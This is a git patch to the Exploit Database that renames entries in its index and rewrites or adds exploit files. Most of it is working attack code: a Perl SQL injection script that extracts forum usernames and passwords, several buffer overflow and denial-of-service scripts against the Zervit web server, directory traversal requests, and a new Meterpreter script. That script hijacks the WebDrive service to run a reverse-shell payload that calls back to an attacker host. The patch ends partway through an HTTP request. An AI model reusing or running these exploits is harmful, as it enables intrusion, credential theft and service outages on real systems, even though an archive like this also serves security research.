From a7c11413af371b872f5c50fda20c4b1fd775c225 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 9 Mar 2016 05:02:46 +0000 Subject: [PATCH] DB: 2016-03-09 1 new exploits --- files.csv | 22 +++--- platforms/php/webapps/2722.pl | 96 +++++++++++------------ platforms/windows/dos/8447.txt | 100 ++++++++++++------------ platforms/windows/dos/8500.py | 62 +++++++-------- platforms/windows/dos/8522.pl | 78 +++++++++--------- platforms/windows/local/11264.rb | 119 ++++++++++++++++++++++++++++ platforms/windows/remote/8463.txt | 54 ++++++------- platforms/windows/remote/8666.txt | 126 +++++++++++++++--------------- 8 files changed, 388 insertions(+), 269 deletions(-) create mode 100755 platforms/windows/local/11264.rb diff --git a/files.csv b/files.csv index 0d242b106..d5f4c3bac 100755 --- a/files.csv +++ b/files.csv @@ -2411,7 +2411,7 @@ id,file,description,date,author,platform,type,port 2719,platforms/php/webapps/2719.php,"Quick.Cms.Lite <= 0.3 (Cookie sLanguage) Local File Include Exploit",2006-11-05,Kacper,php,webapps,0 2720,platforms/php/webapps/2720.pl,"PHP Classifieds <= 7.1 (detail.php) Remote SQL Injection Exploit",2006-11-05,ajann,php,webapps,0 2721,platforms/php/webapps/2721.php,"Ultimate PHP Board <= 2.0 - (header_simple.php) File Include Exploit",2006-11-05,Kacper,php,webapps,0 -2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum (message_details.php) SQL Injection Exploit",2006-11-05,Bl0od3r,php,webapps,0 +2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum - (message_details.php) SQL Injection Exploit",2006-11-05,Bl0od3r,php,webapps,0 2724,platforms/php/webapps/2724.txt,"Soholaunch Pro <= 4.9 r36 - Remote File Inclusion Vulnerabilities",2006-11-06,the_day,php,webapps,0 2725,platforms/php/webapps/2725.txt,"Cyberfolio <= 2.0 RC1 (av) Remote File Include Vulnerabilities",2006-11-06,the_day,php,webapps,0 2726,platforms/php/webapps/2726.txt,"Agora 1.4 RC1 (MysqlfinderAdmin.php) Remote File Include Vulnerability",2006-11-06,the_day,php,webapps,0 @@ -7954,7 +7954,7 @@ id,file,description,date,author,platform,type,port 8444,platforms/windows/local/8444.cpp,"Star Downloader Free <= 1.45 - (.dat) Universal SEH Overwrite Exploit",2009-04-15,dun,windows,local,0 8445,platforms/windows/dos/8445.pl,"Microsoft Windows Media Player - (.mid) Integer Overflow PoC",2009-04-15,HuoFu,windows,dos,0 8446,platforms/php/webapps/8446.txt,"FreeWebshop.org 2.2.9 RC2 (lang_file) Local File Inclusion Vulnerability",2009-04-15,ahmadbady,php,webapps,0 -8447,platforms/windows/dos/8447.txt,"Zervit Webserver 0.02 - Remote Buffer Overflow PoC",2009-04-15,e.wiZz!,windows,dos,0 +8447,platforms/windows/dos/8447.txt,"Zervit Web Server 0.02 - Remote Buffer Overflow PoC",2009-04-15,e.wiZz!,windows,dos,0 8448,platforms/php/webapps/8448.php,"Geeklog <= 1.5.2 - savepreferences()/*blocks[] SQL Injection Exploit",2009-04-16,Nine:Situations:Group,php,webapps,0 8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 (Auth Bypass) SQL Injection Vulnerability",2009-04-16,Dns-Team,php,webapps,0 8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 Insecure Cookie Handling Vulnerability",2009-04-16,ZoRLu,php,webapps,0 @@ -7970,7 +7970,7 @@ id,file,description,date,author,platform,type,port 8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusion Vulnerabilities",2009-04-16,JosS,php,webapps,0 8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 (Login Bypass) SQL Injection Vulnerability",2009-04-16,tmh,php,webapps,0 8462,platforms/windows/dos/8462.pl,"MagicISO CCD/Cue Local Heap Overflow Exploit PoC",2009-04-16,Stack,windows,dos,0 -8463,platforms/windows/remote/8463.txt,"Zervit Webserver 0.02 - Remote Directory Traversal Vulnerability",2009-04-16,e.wiZz!,windows,remote,0 +8463,platforms/windows/remote/8463.txt,"Zervit Web Server 0.02 - Remote Directory Traversal Vulnerability",2009-04-16,e.wiZz!,windows,remote,0 8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 (Auth Bypass) SQL Injection Vulnerability",2009-04-17,"Salvatore Fresta",php,webapps,0 8465,platforms/windows/dos/8465.pl,"Microsoft Media Player - (quartz.dll .mid) Denial of Service Exploit",2009-04-17,"Code Audit Labs",windows,dos,0 8466,platforms/windows/dos/8466.pl,"Microsoft GDI Plugin .png Infinite Loop Denial of Service PoC",2009-04-17,"Code Audit Labs",windows,dos,0 @@ -8007,7 +8007,7 @@ id,file,description,date,author,platform,type,port 8497,platforms/php/webapps/8497.txt,"Creasito e-Commerce 1.3.16 (Auth Bypass) SQL Injection Vuln",2009-04-20,"Salvatore Fresta",php,webapps,0 8498,platforms/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0 8499,platforms/php/webapps/8499.php,"Dokeos Lms <= 1.8.5 (whoisonline.php) PHP Code Injection Exploit",2009-04-21,EgiX,php,webapps,0 -8500,platforms/windows/dos/8500.py,"Zervit Webserver 0.3 - Remote Denial of Service Exploit",2009-04-21,shinnai,windows,dos,0 +8500,platforms/windows/dos/8500.py,"Zervit Web Server 0.3 - Remote Denial of Service Exploit",2009-04-21,shinnai,windows,dos,0 8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 (products_id) SQL Injection Vulnerability",2009-04-21,Player,php,webapps,0 8502,platforms/php/webapps/8502.txt,"pastelcms 0.8.0 - (LFI/SQL) Multiple Vulnerabilities",2009-04-21,SirGod,php,webapps,0 8503,platforms/php/webapps/8503.txt,"TotalCalendar 2.4 (include) Local File Inclusion Vulnerability",2009-04-21,SirGod,php,webapps,0 @@ -8029,7 +8029,7 @@ id,file,description,date,author,platform,type,port 8519,platforms/windows/local/8519.pl,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit",2009-04-22,Stack,windows,local,0 8520,platforms/windows/local/8520.py,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit (2)",2009-04-22,His0k4,windows,local,0 8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 (ab/lfi/su) Multiple Vulnerabilities",2009-04-23,YEnH4ckEr,php,webapps,0 -8522,platforms/windows/dos/8522.pl,"Zervit HTTP Server <= 0.3 (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0 +8522,platforms/windows/dos/8522.pl,"Zervit Web Server <= 0.3 - (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0 8523,platforms/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard Remote DoS PoC",2009-04-23,shinnai,windows,dos,0 8524,platforms/windows/dos/8524.txt,"Home Web Server <= r1.7.1 (build 147) Gui Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0 8525,platforms/windows/remote/8525.pl,"Dream FTP Server 1.02 (users.dat) Arbitrary File Disclosure Exploit",2009-04-23,Cyber-Zone,windows,remote,0 @@ -8171,7 +8171,7 @@ id,file,description,date,author,platform,type,port 8663,platforms/windows/local/8663.pl,"CastRipper 2.50.70 - (.pls) Universal Stack Overflow Exploit",2009-05-12,zAx,windows,local,0 8664,platforms/php/webapps/8664.pl,"BIGACE CMS 2.5 (username) Remote SQL Injection Exploit",2009-05-12,YEnH4ckEr,php,webapps,0 8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment - JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0 -8666,platforms/windows/remote/8666.txt,"zervit webserver 0.4 - Directory Traversal / memory corruption PoC",2009-05-13,"e.wiZz! & shinnai",windows,remote,0 +8666,platforms/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption PoC",2009-05-13,"e.wiZz! & shinnai",windows,remote,0 8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 (script) Local File Disclosure Vulnerability",2009-05-13,ahmadbady,php,webapps,0 8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 Insecure Cookie Handling Vulnerability",2009-05-13,Mr.tro0oqy,php,webapps,0 8669,platforms/multiple/dos/8669.c,"ipsec-tools racoon frag-isakmp Denial of Service PoC",2009-05-13,mu-b,multiple,dos,0 @@ -8224,7 +8224,7 @@ id,file,description,date,author,platform,type,port 8718,platforms/php/webapps/8718.txt,"douran portal <= 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0 8719,platforms/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password Exploit",2009-05-18,Abysssec,asp,webapps,0 8720,platforms/multiple/dos/8720.c,"OpenSSL <= 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion DoS",2009-05-18,"Jon Oberheide",multiple,dos,0 -8721,platforms/windows/dos/8721.pl,"Zervit Webserver 0.04 - (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0 +8721,platforms/windows/dos/8721.pl,"Zervit Web Server 0.04 - (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0 8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 (Get Request) Remote Denial of Service Exploit",2009-05-18,Stack,windows,dos,0 8724,platforms/php/webapps/8724.txt,"LightOpenCMS 0.1 (id) Remote SQL Injection Vulnerability",2009-05-18,Mi4night,php,webapps,0 8725,platforms/php/webapps/8725.php,"Jieqi CMS <= 1.5 - Remote Code Execution Exploit",2009-05-18,Securitylab.ir,php,webapps,0 @@ -10279,7 +10279,7 @@ id,file,description,date,author,platform,type,port 11196,platforms/windows/dos/11196.html,"Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow PoC",2010-01-19,"SarBoT511 and D3V!L FUCKER",windows,dos,0 11197,platforms/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 - (.smi) Local Buffer Overflow PoC",2010-01-19,d3b4g,windows,dos,0 11198,platforms/php/webapps/11198.txt,"al3jeb script Remote Login Bypass Exploit",2010-01-19,"cr4wl3r ",php,webapps,0 -11199,platforms/windows/local/11199.txt,"Windows NT - User Mode to Ring - Escalation Vulnerability",2010-01-19,"Tavis Ormandy",windows,local,0 +11199,platforms/windows/local/11199.txt,"Windows NT - User Mode to Ring Escalation Vulnerability (KiTrap0D)",2010-01-19,"Tavis Ormandy",windows,local,0 11202,platforms/windows/local/11202.pl,"RM Downloader .m3u BoF (SEH)",2010-01-19,jacky,windows,local,0 11203,platforms/multiple/remote/11203.py,"Pidgin MSN <= 2.6.4 File Download Vulnerability",2010-01-19,"Mathieu GASPARD",multiple,remote,0 11204,platforms/windows/remote/11204.html,"AOL 9.5 - ActiveX Exploit (Heap Spray) (0day)",2010-01-20,Dz_attacker,windows,remote,0 @@ -10329,7 +10329,7 @@ id,file,description,date,author,platform,type,port 11261,platforms/php/webapps/11261.txt,"UGiA PHP UPLOADER 0.2 - Shell Upload Vulnerability",2010-01-26,indoushka,php,webapps,0 11262,platforms/php/webapps/11262.php,"Joomla 1.5.12 connect back Exploit",2010-01-26,"Nikola Petrov",php,webapps,0 11263,platforms/php/webapps/11263.php,"Joomla 1.5.12 read/exec Remote files",2010-01-26,"Nikoal Petrov",php,webapps,0 -11264,platforms/windows/local/11264.txt,"South River Technologies WebDrive Service - Bad Security Descriptor Local Privilege Escalation",2010-01-26,Trancer,windows,local,0 +11264,platforms/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Local Privilege Escalation",2010-01-26,Trancer,windows,local,0 11265,platforms/windows/dos/11265.pl,"KOL WaveIOX 1.04 - (.wav) Local Buffer Overflow PoC",2010-01-26,"cr4wl3r ",windows,dos,0 11266,platforms/windows/dos/11266.pl,"KOL Wave Player 1.0 - (.wav) Local Buffer Overflow PoC",2010-01-26,"cr4wl3r ",windows,dos,0 11267,platforms/windows/local/11267.py,"Winamp 5.572 - Exploit SEH",2010-01-26,TecR0c,windows,local,0 @@ -11483,8 +11483,8 @@ id,file,description,date,author,platform,type,port 12578,platforms/windows/dos/12578.c,"Adobe Shockwave Player 11.5.6.606 (DIR) Multiple Memory Vulnerabilities",2010-05-12,LiquidWorm,windows,dos,0 12579,platforms/php/webapps/12579.txt,"Joomla Custom PHP Pages Component com_php LFI Vulnerability",2010-05-12,"Chip d3 bi0s",php,webapps,0 12580,platforms/windows/remote/12580.txt,"miniwebsvr 0.0.10 - Directory Traversal/Listing Exploits",2010-05-12,Dr_IDE,windows,remote,0 -12581,platforms/windows/remote/12581.txt,"zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0 -12582,platforms/windows/remote/12582.txt,"zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0 +12581,platforms/windows/remote/12581.txt,"Zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0 +12582,platforms/windows/remote/12582.txt,"Zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0 12583,platforms/php/webapps/12583.txt,"e-webtech (fixed_page.asp) SQL Injection Vulnerability",2010-05-12,FL0RiX,php,webapps,0 12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0 12585,platforms/php/webapps/12585.txt,"4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0 diff --git a/platforms/php/webapps/2722.pl b/platforms/php/webapps/2722.pl index 8be7cc497..aea5d8bea 100755 --- a/platforms/php/webapps/2722.pl +++ b/platforms/php/webapps/2722.pl @@ -1,48 +1,48 @@ -#!perl -use IO::Socket; -#Download:http://www.thewebdrivers.com/forum.zip -#By:Bl0od3r -#Germany =] -if (@ARGV<3) { -&header; -} else { -&get(); -} -sub get() { -$host=$ARGV[0]; -$path=$ARGV[1]; - $id=$ARGV[2]; -$socket=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>80) -or die ("[-]Error\n"); -print "[~]Connecting!\n"; -print "[~]Getting Data!\n"; -print $socket "GET ".$path."message_details.php?id=-1%20UNION%20SELECT%201,password,username,4,4%20FROM%20tbl_register WHERE id=".$id."/* HTTP/1.1\n"; -print $socket "Host: $host\n"; -print $socket "Accept: */*\n"; -print $socket "Connection: close\n\n"; - -while ($ans=<$socket>) { -$ans=~ m/ Re : -(.*?)-/ && print "--------------------------------------------\n[+]UserName: $1\n[+]PassWord:"; -$ans=~ m/(.*?)<\/td>/ && print "$1\n"; -if ($1) { -$success=1; } else { $success=0;}; -} -if ($success=="1") { -print "\n[+]Successed!"; - } else { -print "[-]Error"; - } - } -sub header() { -print -"--------------------------------------------------------------------\n"; -print "|\t---------->By Bl0od3r<---------\t\t\t\t |"; -print "\n|Usage:script.pl host.com /path/ 1\t\t\t\t |"; -print -"\n--------------------------------------------------------------------\n"; -exit; -} - -# greetz to all dc3 members,matrix_killer and skOd =] - -# milw0rm.com [2006-11-05] +#!perl +use IO::Socket; +#Download:http://www.thewebdrivers.com/forum.zip +#By:Bl0od3r +#Germany =] +if (@ARGV<3) { +&header; +} else { +&get(); +} +sub get() { +$host=$ARGV[0]; +$path=$ARGV[1]; + $id=$ARGV[2]; +$socket=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>80) +or die ("[-]Error\n"); +print "[~]Connecting!\n"; +print "[~]Getting Data!\n"; +print $socket "GET ".$path."message_details.php?id=-1%20UNION%20SELECT%201,password,username,4,4%20FROM%20tbl_register WHERE id=".$id."/* HTTP/1.1\n"; +print $socket "Host: $host\n"; +print $socket "Accept: */*\n"; +print $socket "Connection: close\n\n"; + +while ($ans=<$socket>) { +$ans=~ m/ Re : -(.*?)-/ && print "--------------------------------------------\n[+]UserName: $1\n[+]PassWord:"; +$ans=~ m/(.*?)<\/td>/ && print "$1\n"; +if ($1) { +$success=1; } else { $success=0;}; +} +if ($success=="1") { +print "\n[+]Successed!"; + } else { +print "[-]Error"; + } + } +sub header() { +print +"--------------------------------------------------------------------\n"; +print "|\t---------->By Bl0od3r<---------\t\t\t\t |"; +print "\n|Usage:script.pl host.com /path/ 1\t\t\t\t |"; +print +"\n--------------------------------------------------------------------\n"; +exit; +} + +# greetz to all dc3 members,matrix_killer and skOd =] + +# milw0rm.com [2006-11-05] diff --git a/platforms/windows/dos/8447.txt b/platforms/windows/dos/8447.txt index 84126338e..b5be94fce 100755 --- a/platforms/windows/dos/8447.txt +++ b/platforms/windows/dos/8447.txt @@ -1,50 +1,50 @@ -#################### Zervit Webserver 0.02 Buffer Overflow ############################ - - -############### By: e.wiZz! - -###############Site: www.balcansecurity.com - - -############### Found with ServMeNot (world's sexiest fuzzer :P ) - - - -In the wild... - -######################################################################################## - -######Vend0r site: http://www.ohloh.net/projects/mereo - - -/* When requested uri isn't found,it goes to char tmp[255], -and later it is used to output,you need 256 chars to overflow (check source "http.c") */ - -using System; -using System.IO; -using System.Net; -using System.Text; - -class whatsoever -{ - static void Main() - { - // StringBuilder sb = new StringBuilder(); - - //byte[] buf = new byte[8192]; - - Console.WriteLine("Enter site: (http://localhost)"); - string sajt = Console.ReadLine(); - string uribad = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; - HttpWebRequest request = (HttpWebRequest) - - WebRequest.Create(sajt+uribad); - - HttpWebResponse response = (HttpWebResponse) - request.GetResponse(); - // you shouldn't see response - Console.WriteLine(sb.ToString()); - } -} - -// milw0rm.com [2009-04-15] +#################### Zervit Webserver 0.02 Buffer Overflow ############################ + + +############### By: e.wiZz! + +###############Site: www.balcansecurity.com + + +############### Found with ServMeNot (world's sexiest fuzzer :P ) + + + +In the wild... + +######################################################################################## + +######Vend0r site: http://www.ohloh.net/projects/mereo + + +/* When requested uri isn't found,it goes to char tmp[255], +and later it is used to output,you need 256 chars to overflow (check source "http.c") */ + +using System; +using System.IO; +using System.Net; +using System.Text; + +class whatsoever +{ + static void Main() + { + // StringBuilder sb = new StringBuilder(); + + //byte[] buf = new byte[8192]; + + Console.WriteLine("Enter site: (http://localhost)"); + string sajt = Console.ReadLine(); + string uribad = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; + HttpWebRequest request = (HttpWebRequest) + + WebRequest.Create(sajt+uribad); + + HttpWebResponse response = (HttpWebResponse) + request.GetResponse(); + // you shouldn't see response + Console.WriteLine(sb.ToString()); + } +} + +// milw0rm.com [2009-04-15] diff --git a/platforms/windows/dos/8500.py b/platforms/windows/dos/8500.py index b2f259a00..aa7f150e8 100755 --- a/platforms/windows/dos/8500.py +++ b/platforms/windows/dos/8500.py @@ -1,31 +1,31 @@ -import socket -import sys - -print "------------------------------------------------------" -print " Zervit Webserver 0.3 Remote Denial Of Service " -print " url: http://zervit.sourceforge.net " -print " " -print " author: shinnai " -print " mail: shinnai[at]autistici[dot]org " -print " site: http://www.shinnai.net " -print " " -print " greets to: e.wiZz! for inspiration. Be safe man... " -print " " -print " dedicated to: all those tried to own my site :-p " -print "------------------------------------------------------" - -host = "127.0.0.1" -port = 80 - -try: - buff = "//.\\" * 330 - request = "GET " + buff + " HTTP/1.0" - connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - connection.connect((host, port)) - connection.send(request) - raw_input('\n\nExploit completed. Press "Enter" to quit...') - sys.exit -except: - raw_input('\n\nUnable to connect. Press "Enter" to quit...') - -# milw0rm.com [2009-04-21] +import socket +import sys + +print "------------------------------------------------------" +print " Zervit Webserver 0.3 Remote Denial Of Service " +print " url: http://zervit.sourceforge.net " +print " " +print " author: shinnai " +print " mail: shinnai[at]autistici[dot]org " +print " site: http://www.shinnai.net " +print " " +print " greets to: e.wiZz! for inspiration. Be safe man... " +print " " +print " dedicated to: all those tried to own my site :-p " +print "------------------------------------------------------" + +host = "127.0.0.1" +port = 80 + +try: + buff = "//.\\" * 330 + request = "GET " + buff + " HTTP/1.0" + connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + connection.connect((host, port)) + connection.send(request) + raw_input('\n\nExploit completed. Press "Enter" to quit...') + sys.exit +except: + raw_input('\n\nUnable to connect. Press "Enter" to quit...') + +# milw0rm.com [2009-04-21] diff --git a/platforms/windows/dos/8522.pl b/platforms/windows/dos/8522.pl index 6a67345c7..7f61b343b 100755 --- a/platforms/windows/dos/8522.pl +++ b/platforms/windows/dos/8522.pl @@ -1,39 +1,39 @@ -#!/usr/bin/perl -# -# Zervit HTTP Server <= v0.3 Remote Denial of Service. -# -# -------------------------------------------------------------------- -# The vulnerability is caused due to an error in multi-socket. -# This can be exploited to crash the HTTP service. -# -------------------------------------------------------------------- -# -# Author: Jonathan Salwan -# Mail: submit [AT] shell-storm.org -# Web: http://www.shell-storm.org - - -use IO::Socket; -print "[+] Author : Jonathan Salwan\n"; -print "[+] Soft : Zervit 0.3 Remote DoS\n"; - - if (@ARGV < 1) - { - print "[-] Usage: \n"; - print "[-] Exemple: file.pl 127.0.0.1 80\n"; - exit; - } - - - $ip = $ARGV[0]; - $port = $ARGV[1]; - -print "[+] Sending request...\n"; - -for($i=0;$i=4;$i++) -{ -$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-]Done!\n"; - - print $socket "GET \x11 HTTP/1.0\n\r\n"; -} - -# milw0rm.com [2009-04-22] +#!/usr/bin/perl +# +# Zervit HTTP Server <= v0.3 Remote Denial of Service. +# +# -------------------------------------------------------------------- +# The vulnerability is caused due to an error in multi-socket. +# This can be exploited to crash the HTTP service. +# -------------------------------------------------------------------- +# +# Author: Jonathan Salwan +# Mail: submit [AT] shell-storm.org +# Web: http://www.shell-storm.org + + +use IO::Socket; +print "[+] Author : Jonathan Salwan\n"; +print "[+] Soft : Zervit 0.3 Remote DoS\n"; + + if (@ARGV < 1) + { + print "[-] Usage: \n"; + print "[-] Exemple: file.pl 127.0.0.1 80\n"; + exit; + } + + + $ip = $ARGV[0]; + $port = $ARGV[1]; + +print "[+] Sending request...\n"; + +for($i=0;$i=4;$i++) +{ +$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-]Done!\n"; + + print $socket "GET \x11 HTTP/1.0\n\r\n"; +} + +# milw0rm.com [2009-04-22] diff --git a/platforms/windows/local/11264.rb b/platforms/windows/local/11264.rb new file mode 100755 index 000000000..29c6ce597 --- /dev/null +++ b/platforms/windows/local/11264.rb @@ -0,0 +1,119 @@ +## +# South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation. +# +# This module exploits a privilege escalation vulnerability in South River Technologies WebDrive. +# Due to an empty security descriptor, a local attacker can gain elevated privileges. +# Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3. +# Vulnerability mitigation featured. +# +# Credit: +# - Discovery - Nine:Situations:Group::bellick +# - Meterpreter script - Trancer +# +# References: +# - http://retrogod.altervista.org/9sg_south_river_priv.html +# - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/ +# - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606 +# - http://osvdb.org/show/osvdb/59080 +# +# mtrancer[@]gmail.com +# http://www.rec-sec.com +## + +# +# Options +# +opts = Rex::Parser::Arguments.new( + "-h" => [ false, "This help menu"], + "-m" => [ false, "Mitigate"], + "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"], + "-p" => [ true, "The port on the remote host where Metasploit is listening"] +) + +# +# Default parameters +# + +rhost = Rex::Socket.source_address("1.2.3.4") +rport = 4444 +sname = 'WebDriveService' +pname = 'wdService.exe' + +# +# Option parsing +# +opts.parse(args) do |opt, idx, val| + case opt + when "-h" + print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.") + print_line(opts.usage) + raise Rex::Script::Completed + when "-m" + client.sys.process.get_processes().each do |m| + if ( m['name'] == pname ) + print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.") + + # Set correct service security descriptor to mitigate the vulnerability + print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.") + client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'}) + end + end + raise Rex::Script::Completed + when "-r" + rhost = val + when "-p" + rport = val.to_i + end +end + +client.sys.process.get_processes().each do |m| + if ( m['name'] == pname ) + + print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.") + + # Build out the exe payload. + pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp") + pay.datastore['LHOST'] = rhost + pay.datastore['LPORT'] = rport + raw = pay.generate + + exe = Msf::Util::EXE.to_win32pe(client.framework, raw) + + # Place our newly created exe in %TEMP% + tempdir = client.fs.file.expand_path("%TEMP%") + tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" + print_status("Sending EXE payload '#{tempexe}'.") + fd = client.fs.file.new(tempexe, "wb") + fd.write(exe) + fd.close + + # Stop the vulnerable service + print_status("Stopping service \"#{sname}\"...") + client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'}) + + # Set exe payload as service binpath + print_status("Setting \"#{sname}\" to #{tempexe}...") + client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'}) + sleep(1) + + # Restart the service + print_status("Restarting the \"#{sname}\" service...") + client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'}) + + # Our handler to recieve the callback. + handler = client.framework.exploits.create("multi/handler") + handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp" + handler.datastore['LHOST'] = rhost + handler.datastore['LPORT'] = rport + handler.datastore['ExitOnSession'] = false + + handler.exploit_simple( + 'Payload' => handler.datastore['PAYLOAD'], + 'RunAsJob' => true + ) + + # Set service binpath back to normal + client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'}) + + end +end diff --git a/platforms/windows/remote/8463.txt b/platforms/windows/remote/8463.txt index ad89c0632..9479004ba 100755 --- a/platforms/windows/remote/8463.txt +++ b/platforms/windows/remote/8463.txt @@ -1,27 +1,27 @@ -#################### Zervit Webserver Directory Traversal ############################ - - -############### By: e.wiZz! - -###############Site: www.balcansecurity.com - - -############### Found with ServMeNot (world's sexiest fuzzer :P ) - - - -In the wild... - -######################################################################################## - -#Site: http://zervit.sourceforge.net/ - -#Info: Zervit is the first compact, portable HTTP/Web Server made for human beings. -It is being developed thinking in the people that will make use of it and tries to make itself intuitive. -It aims to make file sharing or displaying a web easier than the current servers do. - -#Vulnerability: - -http://[site]/../../../../../../boot.ini - -# milw0rm.com [2009-04-16] +#################### Zervit Webserver Directory Traversal ############################ + + +############### By: e.wiZz! + +###############Site: www.balcansecurity.com + + +############### Found with ServMeNot (world's sexiest fuzzer :P ) + + + +In the wild... + +######################################################################################## + +#Site: http://zervit.sourceforge.net/ + +#Info: Zervit is the first compact, portable HTTP/Web Server made for human beings. +It is being developed thinking in the people that will make use of it and tries to make itself intuitive. +It aims to make file sharing or displaying a web easier than the current servers do. + +#Vulnerability: + +http://[site]/../../../../../../boot.ini + +# milw0rm.com [2009-04-16] diff --git a/platforms/windows/remote/8666.txt b/platforms/windows/remote/8666.txt index ec1ea2f5d..ecef60300 100755 --- a/platforms/windows/remote/8666.txt +++ b/platforms/windows/remote/8666.txt @@ -1,63 +1,63 @@ -####################### Zervit webserver 0.4 Directory Traversal & Memory Corruption ######### - - -By: e.wiZz! & shinnai - -Site: shinnai.net & balcansecurity.com - - - -[Memory Corruption] -######################################################################## - -import socket - -host = "127.0.0.1" -port = 8080 - -try: - for i in range(1,10): - buff = "a" * 3330 - request = "POST " + buff + " HTTP/1.0" - connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - connection.connect((host, port)) - connection.send(request) -except: - raw_input('\n\nUnable to connect. Press "Enter" to quit...') - - - -[Directory traversal] -################################################################################# - -[Request] - -GET /../../../../../boot.ini HTTP/1.1 -User-Agent: Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1 -Host: localhost:80 -Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 -Accept-Language: en-US,en;q=0.9 -Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 -Accept-Encoding: 